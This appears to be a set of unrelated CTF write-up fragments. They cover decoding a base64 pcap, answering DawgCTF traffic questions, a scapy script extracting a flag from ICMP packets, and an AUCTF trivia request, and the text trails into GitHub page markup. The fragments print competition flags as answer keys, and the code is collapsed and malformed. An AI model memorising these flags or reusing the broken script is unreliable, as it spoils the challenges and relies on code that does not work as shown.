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-----END CERTIFICATE-----```
At this point you can [copy-paste it on your local system](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/In%20ctrl%20%2B%20Percival%20PCAP%20Pandemonium/foo.txt) to decode it in the [original `.pcap` file](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/In%20ctrl%20%2B%20Percival%20PCAP%20Pandemonium/webctrl_out.pcap).
```C:\Users\m3ssap0\CTF\DawgCTF 2020\In ctrl>certutil -decode foo.txt webctrl_out.pcapLunghezza input = 56472Lunghezza output = 41029CertUtil: - Esecuzione comando decode riuscita.```
## Percival PCAP Pandemonium Part 1
* **Category:** web/networking* **Points:** 25
### Challenge
> There is an embedded device and some traffic that was being debugged here.> > What is the IP of the embedded device?> > Submit IP as: DawgCTF{xxx.xx.x.xx}> > Author: drew, Percival
### Solution
Analyzing the traffic you can discover that the IP is: 172.24.0.15.
The flag is the following.
```DawgCTF{172.24.0.15}```
## Percival PCAP Pandemonium Part 2
* **Category:** web/networking* **Points:** 75
### Challenge
> There is an embedded device and some traffic that was being debugged here.> > What frame number restarts the device?> > Enter your response as: DawgCTF{xxx}> > Authors: Percival and drew
### Solution
Analyzing the traffic you can discover that the frame is the #167.
The flag is the following.
```DawgCTF{167}``` |
This challenge involved a pcap file that contained ICMP 26,682 packets, all with src/dst IPs of 127.0.0.1
-----
[]
-----
Scrolling through the packets, some of the packets had a lot of trailing trailing characters that were the same. I created a script to see if there was any pattern that emerged.
-----
```#!/usr/bin/env python3
from scapy.all import *
packets = rdpcap('loopback.pcap')
rawlist = []
for i in packets: x = str(i[Raw].load) for k in range(5,8): if x[-k] == x[-8]: rawlist.append(x[-8])
flag = ""new_rawlist = rawlist[::6]for letter in new_rawlist: flag += str(letter) print("The flag is: " + flag)```
-----
This output the following:
-----
```The TestFlag is: PPPPPPNNNNNNGGGGGGrrnnnnrrIIIIIIHHHHHHDDDDDDRRRRRRrrrrrrqqqqqq888888ggggggAAAAAAMMMMMMAAAAAAaaaaaa ccccccHHHHHHRRRRRRMMMMMMzzzzzz&&&&&&uuuuuu000000``````::::::ppppppQQQQQQ<<<<< |
TL;DR Easy challenge, as the name suggests it can be solved with a Meet-in-the-middle attack.[Here's the writeup](https://int80h.netlify.com/writeup/byte-bandits-2020-meet-me-there/) |
# AUCTF 2020 – Miyazaki Trivia
* **Category:** web* **Points:** 50
## Challenge
> http://challenges.auctf.com:30020> > Here's a bit of trivia for you vidya game nerds.> > Author: shinigami
## Solution
The website prints a message.
```html<doctype html><html> <title>AUCTF</title> <body> <h1>Find this special file.</h1> </body></html>```
Connecting to `http://challenges.auctf.com:30020/robots.txt` will give the following message.
```VIDEO GAME TRIVIA: What is the adage of Byrgenwerth scholars?
MAKE a GET request to this page with a header named 'answer' to submit your answer.```
The answer to the trivia is: `Fear the Old Blood`. So you can perform the requested HTTP GET and you will get the flag.
```GET /robots.txt HTTP/1.1Host: challenges.auctf.com:30020User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0answer: Fear the Old Blood
HTTP/1.1 200 OKDate: Fri, 03 Apr 2020 19:19:14 GMTServer: Apache/2.4.25 (Debian)X-Powered-By: PHP/7.0.33Content-Length: 48Connection: closeContent-Type: text/html; charset=UTF-8
Master Willem was right.auctf{f3ar_z_olD3_8l0oD}``` |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf-writeups/Byte Bandits CTF 2020/pwn/fmt-me at master · KEERRO/ctf-writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="C12C:0F8F:1988A2AA:1A5320D5:64122136" data-pjax-transient="true"/><meta name="html-safe-nonce" content="def3ce7fd04bbc6732dd612d1ff6e1e5d43a14915357bc8731083c55a74370d8" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDMTJDOjBGOEY6MTk4OEEyQUE6MUE1MzIwRDU6NjQxMjIxMzYiLCJ2aXNpdG9yX2lkIjoiMjY5OTc3OTA1MTk1OTIzMDc3NCIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="c0540750779f6c9fb0b7152e27f02bd14b28764aa653d205cd63583cf7451402" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:162845937" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf-writeups/Byte Bandits CTF 2020/pwn/fmt-me at master · KEERRO/ctf-writeups" /><meta name="twitter:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta property="og:image:alt" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf-writeups/Byte Bandits CTF 2020/pwn/fmt-me at master · KEERRO/ctf-writeups" /><meta property="og:url" content="https://github.com/KEERRO/ctf-writeups" /><meta property="og:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/KEERRO/ctf-writeups git https://github.com/KEERRO/ctf-writeups.git">
<meta name="octolytics-dimension-user_id" content="46076094" /><meta name="octolytics-dimension-user_login" content="KEERRO" /><meta name="octolytics-dimension-repository_id" content="162845937" /><meta name="octolytics-dimension-repository_nwo" content="KEERRO/ctf-writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="162845937" /><meta name="octolytics-dimension-repository_network_root_nwo" content="KEERRO/ctf-writeups" />
<link rel="canonical" href="https://github.com/KEERRO/ctf-writeups/tree/master/Byte%20Bandits%20CTF%202020/pwn/fmt-me" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
